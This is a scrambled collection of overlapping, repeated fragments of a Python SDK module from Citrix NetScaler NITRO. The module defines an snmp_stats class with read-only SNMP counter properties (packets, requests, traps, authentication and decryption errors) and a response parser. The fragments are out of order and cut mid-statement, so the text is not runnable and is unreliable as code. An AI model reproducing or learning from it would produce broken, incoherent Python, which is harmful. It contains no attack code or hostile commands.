received.\"\"\" try : return self._snmptotrxpkts except Exception as e:", "self._snmpresponsesrate = 0 self._snmptottraps = 0 self._snmptoterrreqdropped = 0 self._snmptotparseerrs = 0 self._snmptotbadversions", "from nitro.service.options import options from nitro.exception.nitro_exception import nitro_exception from nitro.util.nitro_util import nitro_util class", "as e: raise e @property def snmptotbadcommuse(self) : \"\"\"The total number of SNMP", "def snmptoterrreqdropped(self) : \"\"\"SNMP requests dropped.\"\"\" try : return self._snmptoterrreqdropped except Exception as", "self.errorcode = 0 self.message = \"\" self.severity = \"\" self.sessionid = \"\" self.snmp", "@clearstats.setter def clearstats(self, clearstats) : \"\"\"Clear the statsistics / counters :param clearstats: \"\"\"", "SNMP engine's window.\"\"\" try : return self._snmpnotintimewindow except Exception as e: raise e", "if (result.errorcode == 444) : service.clear_session(self) if result.severity : if (result.severity == \"ERROR\")", "either express or implied. # See the License for the specific language governing", "engine's window.\"\"\" try : return self._snmpnotintimewindow except Exception as e: raise e @property", ": return self._snmptotgetreqs except Exception as e: raise e @property def snmprxpktsrate(self) :", "except Exception as e: raise e @property def snmpgetnextreqsrate(self) : \"\"\"Rate (/s) counter", "return self._snmpgetreqsrate except Exception as e: raise e @property def snmptotbadcommname(self) : \"\"\"SNMP", "e @property def snmptottxpkts(self) : \"\"\"SNMP packets transmitted.\"\"\" try : return self._snmptottxpkts except", "return self._snmpwrongdigests except Exception as e: raise e @property def snmpgetbulkreqsrate(self) : \"\"\"Rate", "(/s) counter for snmptotgetnextreqs.\"\"\" try : return self._snmpgetnextreqsrate except Exception as e: raise", "\"\"\"SNMP packets that were dropped because they did not contain the expected digest", "appeared outside of the authoritative SNMP engine's window.\"\"\" try : return self._snmpnotintimewindow except", "= service.payload_formatter.string_to_resource(snmp_response, response, self.__class__.__name__.replace('_stats','')) if(result.errorcode != 0) : if (result.errorcode == 444) :", "return self._snmptoterrreqdropped except Exception as e: raise e @property def snmpgetnextreqsrate(self) : \"\"\"Rate", "an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either", "as e: raise e @property def snmptotparseerrs(self) : \"\"\"Number of ASN.1 or BER", "full = \"full\" class snmp_response(base_response) : \"\"\" \"\"\" def __init__(self, length=1) : self.snmp", "self._clearstats except Exception as e: raise e @clearstats.setter def clearstats(self, clearstats) : \"\"\"Clear", "_get_nitro_response(self, service, response) : \"\"\"converts nitro response into object and returns the object", "self._clearstats = clearstats except Exception as e: raise e @property def snmpdecryptionerrors(self) :", "nitro.resource.base.base_resource import base_resource from nitro.resource.base.base_resource import base_response from nitro.service.options import options from nitro.exception.nitro_exception", "self._clearstats = \"\" self._snmptotrxpkts = 0 self._snmprxpktsrate = 0 self._snmptottxpkts = 0 self._snmptxpktsrate", "def snmpresponsesrate(self) : \"\"\"Rate (/s) counter for snmptotresponses.\"\"\" try : return self._snmpresponsesrate except", "nitro.service.options import options from nitro.exception.nitro_exception import nitro_exception from nitro.util.nitro_util import nitro_util class snmp_stats(base_resource)", "the NetScaler or otherwise unavailable. \"\"\" try : return self._snmpunsupportedsecuritylevel except Exception as", "try : return self._snmpgetreqsrate except Exception as e: raise e @property def snmptotbadcommname(self)", "\"\"\" def __init__(self) : self._clearstats = \"\" self._snmptotrxpkts = 0 self._snmprxpktsrate = 0", ": return self._snmptxpktsrate except Exception as e: raise e @property def snmpresponsesrate(self) :", "try : return self._snmptotbadcommname except Exception as e: raise e @property def snmptotgetnextreqs(self)", "self._snmptoterrreqdropped except Exception as e: raise e @property def snmpgetnextreqsrate(self) : \"\"\"Rate (/s)", "def snmptottxpkts(self) : \"\"\"SNMP packets transmitted.\"\"\" try : return self._snmptottxpkts except Exception as", "self._snmpunknownengineids = 0 self._snmpwrongdigests = 0 self._snmpdecryptionerrors = 0 @property def clearstats(self) :", "0 self._snmptotgetreqs = 0 self._snmpgetreqsrate = 0 self._snmptotgetnextreqs = 0 self._snmpgetnextreqsrate = 0", "[] self.errorcode = 0 self.message = \"\" self.severity = \"\" self.sessionid = \"\"", "snmptottraps(self) : \"\"\"SNMP Trap PDUs that have been generated by the NetScaler.\"\"\" try", "the License. # from nitro.resource.base.base_resource import base_resource from nitro.resource.base.base_resource import base_response from nitro.service.options", "the License. # You may obtain a copy of the License at #", "specific language governing permissions and # limitations under the License. # from nitro.resource.base.base_resource", "= \"\") \"\"\" try : obj = snmp_stats() if not name : response", "\"\" self._snmptotrxpkts = 0 self._snmprxpktsrate = 0 self._snmptottxpkts = 0 self._snmptxpktsrate = 0", "SNMP engine ID that was not known to the NetScaler.\"\"\" try : return", "e @property def snmptotbadcommuse(self) : \"\"\"The total number of SNMP Messages received that", "dropped.\"\"\" try : return self._snmptoterrreqdropped except Exception as e: raise e @property def", "# distributed under the License is distributed on an \"AS IS\" BASIS, #", "snmptxpktsrate(self) : \"\"\"Rate (/s) counter for snmptottxpkts.\"\"\" try : return self._snmptxpktsrate except Exception", "that have been accepted and proZcessed.\"\"\" try : return self._snmptotgetbulkreqs except Exception as", ": \"\"\"The total number of SNMP Messages received that represented an SNMP operation", "return self._snmpunknownusername except Exception as e: raise e @property def snmpunsupportedsecuritylevel(self) : \"\"\"SNMP", "@classmethod def get(cls, service, name=\"\", option_=\"\") : \"\"\"Use this API to fetch the", "e @classmethod def get(cls, service, name=\"\", option_=\"\") : \"\"\"Use this API to fetch", "is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF", "def snmpgetreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetreqs.\"\"\" try : return self._snmpgetreqsrate except", "= 0 self._snmptxpktsrate = 0 self._snmptotgetreqs = 0 self._snmpgetreqsrate = 0 self._snmptotgetnextreqs =", "a user that was not known to the SNMP engine.\"\"\" try : return", "def _get_nitro_response(self, service, response) : \"\"\"converts nitro response into object and returns the", "@property def snmpresponsesrate(self) : \"\"\"Rate (/s) counter for snmptotresponses.\"\"\" try : return self._snmpresponsesrate", "= 0 self._snmpunknownusername = 0 self._snmpunknownengineids = 0 self._snmpwrongdigests = 0 self._snmpdecryptionerrors =", ": return self._snmptottxpkts except Exception as e: raise e @property def snmptotparseerrs(self) :", "were dropped because they referenced a user that was not known to the", "raise e @property def snmptxpktsrate(self) : \"\"\"Rate (/s) counter for snmptottxpkts.\"\"\" try :", "0 self._snmpunknownusername = 0 self._snmpunknownengineids = 0 self._snmpwrongdigests = 0 self._snmpdecryptionerrors = 0", "self._snmpdecryptionerrors = 0 @property def clearstats(self) : \"\"\"Clear the statsistics / counters.<br/>Possible values", "nitro.util.nitro_util import nitro_util class snmp_stats(base_resource) : \"\"\" \"\"\" def __init__(self) : self._clearstats =", "0 self._snmptottraps = 0 self._snmptoterrreqdropped = 0 self._snmptotparseerrs = 0 self._snmptotbadversions = 0", "response: \"\"\" try : result = service.payload_formatter.string_to_resource(snmp_response, response, self.__class__.__name__.replace('_stats','')) if(result.errorcode != 0) :", ": self.snmp = [] self.errorcode = 0 self.message = \"\" self.severity = \"\"", "security level that was unknown to the NetScaler or otherwise unavailable. \"\"\" try", "as e: raise e @property def snmpgetnextreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetnextreqs.\"\"\"", "Inc. # # Licensed under the Apache License, Version 2.0 (the \"License\") #", "self._snmpnotintimewindow = 0 self._snmpunknownusername = 0 self._snmpunknownengineids = 0 self._snmpwrongdigests = 0 self._snmpdecryptionerrors", "nitro_exception from nitro.util.nitro_util import nitro_util class snmp_stats(base_resource) : \"\"\" \"\"\" def __init__(self) :", "governing permissions and # limitations under the License. # from nitro.resource.base.base_resource import base_resource", "@property def snmptotgetbulkreqs(self) : \"\"\"SNMP Get-Bulk PDUs that have been accepted and proZcessed.\"\"\"", "from nitro.resource.base.base_resource import base_resource from nitro.resource.base.base_resource import base_response from nitro.service.options import options from", "\"ERROR\") : raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) else : raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) return", "obj.stat_resources(service, option_) return response except Exception as e: raise e class Clearstats: \"\"\"", "counter for snmptotgetnextreqs.\"\"\" try : return self._snmpgetnextreqsrate except Exception as e: raise e", "case of get request. :param service: :param response: \"\"\" try : result =", "\"\"\"SNMP Get-Request PDUs that have been accepted and processed.\"\"\" try : return self._snmptotgetreqs", "were dropped because they requested a security level that was unknown to the", "Citrix Systems, Inc. # # Licensed under the Apache License, Version 2.0 (the", "unsupported SNMP version.\"\"\" try : return self._snmptotbadversions except Exception as e: raise e", "for snmptotgetnextreqs.\"\"\" try : return self._snmpgetnextreqsrate except Exception as e: raise e @property", ": return self._snmptotgetbulkreqs except Exception as e: raise e @property def snmpunknownusername(self) :", "e: raise e @property def snmpdecryptionerrors(self) : \"\"\"SNMP packets that were dropped because", "Exception as e: raise e @property def snmptotgetreqs(self) : \"\"\"SNMP Get-Request PDUs that", "with the License. # You may obtain a copy of the License at", "self._snmptotbadversions = 0 self._snmptotbadcommname = 0 self._snmptotbadcommuse = 0 self._snmpunsupportedsecuritylevel = 0 self._snmpnotintimewindow", "the authoritative SNMP engine's window.\"\"\" try : return self._snmpnotintimewindow except Exception as e:", "e: raise e @property def snmpgetbulkreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetbulkreqs.\"\"\" try", "@property def snmptotgetnextreqs(self) : \"\"\"SNMP Get-Next PDUs that have been accepted and processed.\"\"\"", "snmpwrongdigests(self) : \"\"\"SNMP packets that were dropped because they did not contain the", "= \"\" self.severity = \"\" self.sessionid = \"\" self.snmp = [snmp_stats() for _", "decrypted.\"\"\" try : return self._snmpdecryptionerrors except Exception as e: raise e @property def", "of SNMP Messages received that represented an SNMP operation which was not allowed", ": \"\"\"Rate (/s) counter for snmptotgetreqs.\"\"\" try : return self._snmpgetreqsrate except Exception as", "as e: raise e @property def snmptotgetnextreqs(self) : \"\"\"SNMP Get-Next PDUs that have", "to the NetScaler.\"\"\" try : return self._snmpunknownengineids except Exception as e: raise e", "identifier argument\"\"\" try : return 0 except Exception as e : raise e", "decoding received SNMP Messages.\"\"\" try : return self._snmptotparseerrs except Exception as e: raise", "raise e @property def snmptotresponses(self) : \"\"\"SNMP Get-Response PDUs that have been generated", "SNMP operation which was not allowed by the SNMP community named in the", "snmptotgetnextreqs(self) : \"\"\"SNMP Get-Next PDUs that have been accepted and processed.\"\"\" try :", "SNMP engine.\"\"\" try : return self._snmpunknownusername except Exception as e: raise e @property", ": \"\"\"SNMP packets that were dropped because they referenced a user that was", "@property def snmptotgetreqs(self) : \"\"\"SNMP Get-Request PDUs that have been accepted and processed.\"\"\"", "self._snmpgetreqsrate except Exception as e: raise e @property def snmptotbadcommname(self) : \"\"\"SNMP messages", ": \"\"\"SNMP Get-Request PDUs that have been accepted and processed.\"\"\" try : return", "\"\"\"Number of ASN.1 or BER errors encountered when decoding received SNMP Messages.\"\"\" try", "because they requested a security level that was unknown to the NetScaler or", "e class Clearstats: \"\"\" \"\"\" basic = \"basic\" full = \"full\" class snmp_response(base_response)", "the NetScaler.\"\"\" try : return self._snmptotbadcommname except Exception as e: raise e @property", "value = \"\") :param option_: (Default value = \"\") \"\"\" try : obj", "@property def snmptotresponses(self) : \"\"\"SNMP Get-Response PDUs that have been generated by the", "clearstats(self) : \"\"\"Clear the statsistics / counters.<br/>Possible values = basic, full.\"\"\" try :", "def clearstats(self) : \"\"\"Clear the statsistics / counters.<br/>Possible values = basic, full.\"\"\" try", "law or agreed to in writing, software # distributed under the License is", "try : obj = snmp_stats() if not name : response = obj.stat_resources(service, option_)", "the License for the specific language governing permissions and # limitations under the", "@property def snmpnotintimewindow(self) : \"\"\"SNMP packets that were dropped because they appeared outside", "def snmpunknownusername(self) : \"\"\"SNMP packets that were dropped because they referenced a user", "snmpgetnextreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetnextreqs.\"\"\" try : return self._snmpgetnextreqsrate except Exception", "snmpunknownusername(self) : \"\"\"SNMP packets that were dropped because they referenced a user that", "received, which used an SNMP community name not known to the NetScaler.\"\"\" try", "on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,", "= 0 self._snmptotbadcommuse = 0 self._snmpunsupportedsecuritylevel = 0 self._snmpnotintimewindow = 0 self._snmpunknownusername =", "messages received, which were for an unsupported SNMP version.\"\"\" try : return self._snmptotbadversions", "Systems, Inc. # # Licensed under the Apache License, Version 2.0 (the \"License\")", "Trap PDUs that have been generated by the NetScaler.\"\"\" try : return self._snmptottraps", "try : return self._snmptoterrreqdropped except Exception as e: raise e @property def snmpgetnextreqsrate(self)", "self._snmptxpktsrate except Exception as e: raise e @property def snmpresponsesrate(self) : \"\"\"Rate (/s)", "to the NetScaler or otherwise unavailable. \"\"\" try : return self._snmpunsupportedsecuritylevel except Exception", "e: raise e class Clearstats: \"\"\" \"\"\" basic = \"basic\" full = \"full\"", "= 0 self._snmptotgetbulkreqs = 0 self._snmpgetbulkreqsrate = 0 self._snmptotresponses = 0 self._snmpresponsesrate =", "snmptotresponses.\"\"\" try : return self._snmpresponsesrate except Exception as e: raise e @property def", "= 0 self._snmptoterrreqdropped = 0 self._snmptotparseerrs = 0 self._snmptotbadversions = 0 self._snmptotbadcommname =", "raise e @property def snmptotrxpkts(self) : \"\"\"SNMP packets received.\"\"\" try : return self._snmptotrxpkts", "_get_object_name(self) : \"\"\"Returns the value of object identifier argument\"\"\" try : return 0", "counter for snmptotrxpkts.\"\"\" try : return self._snmprxpktsrate except Exception as e: raise e", "Exception as e: raise e @property def snmptotbadcommname(self) : \"\"\"SNMP messages received, which", "if (result.severity == \"ERROR\") : raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) else : raise nitro_exception(result.errorcode,", "str(result.severity)) else : raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) return result.snmp except Exception as e", "/ counters :param clearstats: \"\"\" try : self._clearstats = clearstats except Exception as", "self._snmptotbadcommuse except Exception as e: raise e @property def snmptoterrreqdropped(self) : \"\"\"SNMP requests", ": \"\"\"SNMP Trap PDUs that have been generated by the NetScaler.\"\"\" try :", "snmptotgetbulkreqs(self) : \"\"\"SNMP Get-Bulk PDUs that have been accepted and proZcessed.\"\"\" try :", "self._snmptotgetbulkreqs except Exception as e: raise e @property def snmpunknownusername(self) : \"\"\"SNMP packets", "been generated by the NetScaler.\"\"\" try : return self._snmptotresponses except Exception as e:", "self._snmpwrongdigests = 0 self._snmpdecryptionerrors = 0 @property def clearstats(self) : \"\"\"Clear the statsistics", ": return self._snmpnotintimewindow except Exception as e: raise e @property def snmptotgetbulkreqs(self) :", "dropped because they could not be decrypted.\"\"\" try : return self._snmpdecryptionerrors except Exception", "return self._snmptotrxpkts except Exception as e: raise e @property def snmptottxpkts(self) : \"\"\"SNMP", "were dropped because they did not contain the expected digest value.\"\"\" try :", "try : return self._snmptotgetbulkreqs except Exception as e: raise e @property def snmpunknownusername(self)", "!= 0) : if (result.errorcode == 444) : service.clear_session(self) if result.severity : if", "e: raise e @property def snmptotresponses(self) : \"\"\"SNMP Get-Response PDUs that have been", ": obj = snmp_stats() if not name : response = obj.stat_resources(service, option_) return", "in compliance with the License. # You may obtain a copy of the", "encountered when decoding received SNMP Messages.\"\"\" try : return self._snmptotparseerrs except Exception as", "License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or", "name=\"\", option_=\"\") : \"\"\"Use this API to fetch the statistics of all snmp_stats", ": \"\"\"SNMP packets received.\"\"\" try : return self._snmptotrxpkts except Exception as e: raise", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #", "self._snmprxpktsrate except Exception as e: raise e def _get_nitro_response(self, service, response) : \"\"\"converts", "e: raise e @property def snmptotgetreqs(self) : \"\"\"SNMP Get-Request PDUs that have been", "self._snmprxpktsrate = 0 self._snmptottxpkts = 0 self._snmptxpktsrate = 0 self._snmptotgetreqs = 0 self._snmpgetreqsrate", "SNMP Messages received that represented an SNMP operation which was not allowed by", "at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed", "try : return self._snmpunsupportedsecuritylevel except Exception as e: raise e @property def snmptotgetreqs(self)", "self._snmptotbadcommname = 0 self._snmptotbadcommuse = 0 self._snmpunsupportedsecuritylevel = 0 self._snmpnotintimewindow = 0 self._snmpunknownusername", "return self._snmptxpktsrate except Exception as e: raise e @property def snmpresponsesrate(self) : \"\"\"Rate", "as e: raise e @property def snmpunknownengineids(self) : \"\"\"SNMP packets that were dropped", "return result.snmp except Exception as e : raise e def _get_object_name(self) : \"\"\"Returns", "in case of get request. :param service: :param response: \"\"\" try : result", "import nitro_exception from nitro.util.nitro_util import nitro_util class snmp_stats(base_resource) : \"\"\" \"\"\" def __init__(self)", "Get-Bulk PDUs that have been accepted and proZcessed.\"\"\" try : return self._snmptotgetbulkreqs except", "generated by the NetScaler.\"\"\" try : return self._snmptottraps except Exception as e: raise", "See the License for the specific language governing permissions and # limitations under", "were dropped because they could not be decrypted.\"\"\" try : return self._snmpdecryptionerrors except", "BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", "accepted and processed.\"\"\" try : return self._snmptotgetreqs except Exception as e: raise e", "Exception as e: raise e @property def snmptotgetbulkreqs(self) : \"\"\"SNMP Get-Bulk PDUs that", "str(result.message), str(result.severity)) return result.snmp except Exception as e : raise e def _get_object_name(self)", "Clearstats: \"\"\" \"\"\" basic = \"basic\" full = \"full\" class snmp_response(base_response) : \"\"\"", "of object identifier argument\"\"\" try : return 0 except Exception as e :", "represented an SNMP operation which was not allowed by the SNMP community named", "language governing permissions and # limitations under the License. # from nitro.resource.base.base_resource import", "a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required", "self._snmptotbadcommname except Exception as e: raise e @property def snmptotgetnextreqs(self) : \"\"\"SNMP Get-Next", "except Exception as e: raise e @property def snmpgetbulkreqsrate(self) : \"\"\"Rate (/s) counter", "as e: raise e @property def snmpresponsesrate(self) : \"\"\"Rate (/s) counter for snmptotresponses.\"\"\"", "processed.\"\"\" try : return self._snmptotgetnextreqs except Exception as e: raise e @property def", "\"\"\"SNMP requests dropped.\"\"\" try : return self._snmptoterrreqdropped except Exception as e: raise e", "# http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in", "def snmptotgetbulkreqs(self) : \"\"\"SNMP Get-Bulk PDUs that have been accepted and proZcessed.\"\"\" try", "because they appeared outside of the authoritative SNMP engine's window.\"\"\" try : return", "snmp_stats resources that are configured on netscaler. :param service: :param name: (Default value", "return self._snmptotbadcommname except Exception as e: raise e @property def snmptotgetnextreqs(self) : \"\"\"SNMP", "operation which was not allowed by the SNMP community named in the Message.\"\"\"", "e @property def snmpunsupportedsecuritylevel(self) : \"\"\"SNMP packets that were dropped because they requested", "# Copyright (c) 2008-2015 Citrix Systems, Inc. # # Licensed under the Apache", "e @property def snmptotgetreqs(self) : \"\"\"SNMP Get-Request PDUs that have been accepted and", "basic = \"basic\" full = \"full\" class snmp_response(base_response) : \"\"\" \"\"\" def __init__(self,", ": \"\"\"Number of SNMP messages received, which were for an unsupported SNMP version.\"\"\"", "except Exception as e: raise e @property def snmpgetreqsrate(self) : \"\"\"Rate (/s) counter", "obj = snmp_stats() if not name : response = obj.stat_resources(service, option_) return response", "except Exception as e: raise e @property def snmptottxpkts(self) : \"\"\"SNMP packets transmitted.\"\"\"", "Exception as e: raise e @property def snmptottraps(self) : \"\"\"SNMP Trap PDUs that", "raise e @property def snmpdecryptionerrors(self) : \"\"\"SNMP packets that were dropped because they", "and processed.\"\"\" try : return self._snmptotgetreqs except Exception as e: raise e @property", "nitro response into object and returns the object array in case of get", "if(result.errorcode != 0) : if (result.errorcode == 444) : service.clear_session(self) if result.severity :", "try : return self._snmptotgetreqs except Exception as e: raise e @property def snmprxpktsrate(self)", "\"\"\"SNMP packets that were dropped because they could not be decrypted.\"\"\" try :", "snmptotparseerrs(self) : \"\"\"Number of ASN.1 or BER errors encountered when decoding received SNMP", "@property def snmpwrongdigests(self) : \"\"\"SNMP packets that were dropped because they did not", ": return self._snmprxpktsrate except Exception as e: raise e def _get_nitro_response(self, service, response)", "import base_response from nitro.service.options import options from nitro.exception.nitro_exception import nitro_exception from nitro.util.nitro_util import", "nitro_exception(result.errorcode, str(result.message), str(result.severity)) else : raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) return result.snmp except Exception", "self._snmptxpktsrate = 0 self._snmptotgetreqs = 0 self._snmpgetreqsrate = 0 self._snmptotgetnextreqs = 0 self._snmpgetnextreqsrate", "counters :param clearstats: \"\"\" try : self._clearstats = clearstats except Exception as e:", "# # Licensed under the Apache License, Version 2.0 (the \"License\") # you", "import options from nitro.exception.nitro_exception import nitro_exception from nitro.util.nitro_util import nitro_util class snmp_stats(base_resource) :", "\"\"\"Use this API to fetch the statistics of all snmp_stats resources that are", "Exception as e: raise e class Clearstats: \"\"\" \"\"\" basic = \"basic\" full", "import base_resource from nitro.resource.base.base_resource import base_response from nitro.service.options import options from nitro.exception.nitro_exception import", "try : return self._snmptotgetnextreqs except Exception as e: raise e @property def snmpunknownengineids(self)", "because they did not contain the expected digest value.\"\"\" try : return self._snmpwrongdigests", "response except Exception as e: raise e class Clearstats: \"\"\" \"\"\" basic =", "for snmptotresponses.\"\"\" try : return self._snmpresponsesrate except Exception as e: raise e @property", "of SNMP messages received, which were for an unsupported SNMP version.\"\"\" try :", "return self._snmptottraps except Exception as e: raise e @property def snmptotbadversions(self) : \"\"\"Number", "generated by the NetScaler.\"\"\" try : return self._snmptotresponses except Exception as e: raise", "self.snmp = [] self.errorcode = 0 self.message = \"\" self.severity = \"\" self.sessionid", "self._snmptotbadversions except Exception as e: raise e @property def snmptxpktsrate(self) : \"\"\"Rate (/s)", "as e: raise e @property def snmptotresponses(self) : \"\"\"SNMP Get-Response PDUs that have", "\"\"\" \"\"\" basic = \"basic\" full = \"full\" class snmp_response(base_response) : \"\"\" \"\"\"", "def snmptotbadcommname(self) : \"\"\"SNMP messages received, which used an SNMP community name not", "@property def snmpunknownengineids(self) : \"\"\"SNMP packets that were dropped because they referenced an", "raise e @property def snmptottxpkts(self) : \"\"\"SNMP packets transmitted.\"\"\" try : return self._snmptottxpkts", "\"\"\" try : result = service.payload_formatter.string_to_resource(snmp_response, response, self.__class__.__name__.replace('_stats','')) if(result.errorcode != 0) : if", "except in compliance with the License. # You may obtain a copy of", "return self._snmpgetbulkreqsrate except Exception as e: raise e @property def snmpnotintimewindow(self) : \"\"\"SNMP", "0 self._snmptotparseerrs = 0 self._snmptotbadversions = 0 self._snmptotbadcommname = 0 self._snmptotbadcommuse = 0", "raise e class Clearstats: \"\"\" \"\"\" basic = \"basic\" full = \"full\" class", "snmptottxpkts(self) : \"\"\"SNMP packets transmitted.\"\"\" try : return self._snmptottxpkts except Exception as e:", "nitro.resource.base.base_resource import base_response from nitro.service.options import options from nitro.exception.nitro_exception import nitro_exception from nitro.util.nitro_util", "self._snmpgetreqsrate = 0 self._snmptotgetnextreqs = 0 self._snmpgetnextreqsrate = 0 self._snmptotgetbulkreqs = 0 self._snmpgetbulkreqsrate", "the NetScaler.\"\"\" try : return self._snmptotresponses except Exception as e: raise e @property", "@property def snmprxpktsrate(self) : \"\"\"Rate (/s) counter for snmptotrxpkts.\"\"\" try : return self._snmprxpktsrate", "object identifier argument\"\"\" try : return 0 except Exception as e : raise", "not known to the SNMP engine.\"\"\" try : return self._snmpunknownusername except Exception as", "/ counters.<br/>Possible values = basic, full.\"\"\" try : return self._clearstats except Exception as", "counter for snmptotgetreqs.\"\"\" try : return self._snmpgetreqsrate except Exception as e: raise e", "NetScaler.\"\"\" try : return self._snmpunknownengineids except Exception as e: raise e @property def", "from nitro.util.nitro_util import nitro_util class snmp_stats(base_resource) : \"\"\" \"\"\" def __init__(self) : self._clearstats", "try : return self._snmptotbadversions except Exception as e: raise e @property def snmptxpktsrate(self)", "0 self._snmpunsupportedsecuritylevel = 0 self._snmpnotintimewindow = 0 self._snmpunknownusername = 0 self._snmpunknownengineids = 0", "# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0", "may not use this file except in compliance with the License. # You", "License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS", "self._snmpgetbulkreqsrate = 0 self._snmptotresponses = 0 self._snmpresponsesrate = 0 self._snmptottraps = 0 self._snmptoterrreqdropped", "self._snmpunknownusername = 0 self._snmpunknownengineids = 0 self._snmpwrongdigests = 0 self._snmpdecryptionerrors = 0 @property", "Messages.\"\"\" try : return self._snmptotparseerrs except Exception as e: raise e @property def", "def snmpunknownengineids(self) : \"\"\"SNMP packets that were dropped because they referenced an SNMP", ": \"\"\"SNMP packets that were dropped because they referenced an SNMP engine ID", "known to the NetScaler.\"\"\" try : return self._snmptotbadcommname except Exception as e: raise", "to the SNMP engine.\"\"\" try : return self._snmpunknownusername except Exception as e: raise", "as e: raise e @property def snmprxpktsrate(self) : \"\"\"Rate (/s) counter for snmptotrxpkts.\"\"\"", "str(result.message), str(result.severity)) else : raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) return result.snmp except Exception as", "self._snmptotgetnextreqs except Exception as e: raise e @property def snmpunknownengineids(self) : \"\"\"SNMP packets", ":param response: \"\"\" try : result = service.payload_formatter.string_to_resource(snmp_response, response, self.__class__.__name__.replace('_stats','')) if(result.errorcode != 0)", "str(result.severity)) return result.snmp except Exception as e : raise e def _get_object_name(self) :", "e: raise e @clearstats.setter def clearstats(self, clearstats) : \"\"\"Clear the statsistics / counters", "PDUs that have been accepted and proZcessed.\"\"\" try : return self._snmptotgetbulkreqs except Exception", "and proZcessed.\"\"\" try : return self._snmptotgetbulkreqs except Exception as e: raise e @property", "@property def snmpunsupportedsecuritylevel(self) : \"\"\"SNMP packets that were dropped because they requested a", "@property def snmpgetnextreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetnextreqs.\"\"\" try : return self._snmpgetnextreqsrate", "try : return self._snmpnotintimewindow except Exception as e: raise e @property def snmptotgetbulkreqs(self)", "except Exception as e: raise e @property def snmptotgetreqs(self) : \"\"\"SNMP Get-Request PDUs", "snmpnotintimewindow(self) : \"\"\"SNMP packets that were dropped because they appeared outside of the", "as e: raise e class Clearstats: \"\"\" \"\"\" basic = \"basic\" full =", "ID that was not known to the NetScaler.\"\"\" try : return self._snmpunknownengineids except", "Messages received that represented an SNMP operation which was not allowed by the", "nitro_exception(result.errorcode, str(result.message), str(result.severity)) return result.snmp except Exception as e : raise e def", "packets that were dropped because they requested a security level that was unknown", "for snmptottxpkts.\"\"\" try : return self._snmptxpktsrate except Exception as e: raise e @property", "raise e @property def snmpnotintimewindow(self) : \"\"\"SNMP packets that were dropped because they", "self._snmptotbadcommuse = 0 self._snmpunsupportedsecuritylevel = 0 self._snmpnotintimewindow = 0 self._snmpunknownusername = 0 self._snmpunknownengineids", "raise e @property def snmptotparseerrs(self) : \"\"\"Number of ASN.1 or BER errors encountered", "have been accepted and processed.\"\"\" try : return self._snmptotgetreqs except Exception as e:", "e: raise e @property def snmptoterrreqdropped(self) : \"\"\"SNMP requests dropped.\"\"\" try : return", "NetScaler or otherwise unavailable. \"\"\" try : return self._snmpunsupportedsecuritylevel except Exception as e:", "e: raise e @property def snmpunsupportedsecuritylevel(self) : \"\"\"SNMP packets that were dropped because", ":param name: (Default value = \"\") :param option_: (Default value = \"\") \"\"\"", "raise e @property def snmpgetreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetreqs.\"\"\" try :", "as e : raise e @classmethod def get(cls, service, name=\"\", option_=\"\") : \"\"\"Use", "PDUs that have been generated by the NetScaler.\"\"\" try : return self._snmptotresponses except", "else : raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) return result.snmp except Exception as e :", "return response except Exception as e: raise e class Clearstats: \"\"\" \"\"\" basic", "0 self._snmpnotintimewindow = 0 self._snmpunknownusername = 0 self._snmpunknownengineids = 0 self._snmpwrongdigests = 0", "response) : \"\"\"converts nitro response into object and returns the object array in", "be decrypted.\"\"\" try : return self._snmpdecryptionerrors except Exception as e: raise e @property", "a security level that was unknown to the NetScaler or otherwise unavailable. \"\"\"", "def clearstats(self, clearstats) : \"\"\"Clear the statsistics / counters :param clearstats: \"\"\" try", "been accepted and proZcessed.\"\"\" try : return self._snmptotgetbulkreqs except Exception as e: raise", "name : response = obj.stat_resources(service, option_) return response except Exception as e: raise", "dropped because they did not contain the expected digest value.\"\"\" try : return", "the value of object identifier argument\"\"\" try : return 0 except Exception as", "Exception as e: raise e @property def snmpresponsesrate(self) : \"\"\"Rate (/s) counter for", "service: :param name: (Default value = \"\") :param option_: (Default value = \"\")", "e @property def snmptotgetnextreqs(self) : \"\"\"SNMP Get-Next PDUs that have been accepted and", "name: (Default value = \"\") :param option_: (Default value = \"\") \"\"\" try", "e: raise e @property def snmprxpktsrate(self) : \"\"\"Rate (/s) counter for snmptotrxpkts.\"\"\" try", "outside of the authoritative SNMP engine's window.\"\"\" try : return self._snmpnotintimewindow except Exception", "@property def snmptotbadcommname(self) : \"\"\"SNMP messages received, which used an SNMP community name", "\"\"\"Clear the statsistics / counters :param clearstats: \"\"\" try : self._clearstats = clearstats", "statsistics / counters :param clearstats: \"\"\" try : self._clearstats = clearstats except Exception", "under the License. # from nitro.resource.base.base_resource import base_resource from nitro.resource.base.base_resource import base_response from", "e: raise e @property def snmptotgetbulkreqs(self) : \"\"\"SNMP Get-Bulk PDUs that have been", ": raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) else : raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) return result.snmp", "try : return self._snmpunknownengineids except Exception as e: raise e @property def snmpwrongdigests(self)", "Exception as e: raise e @property def 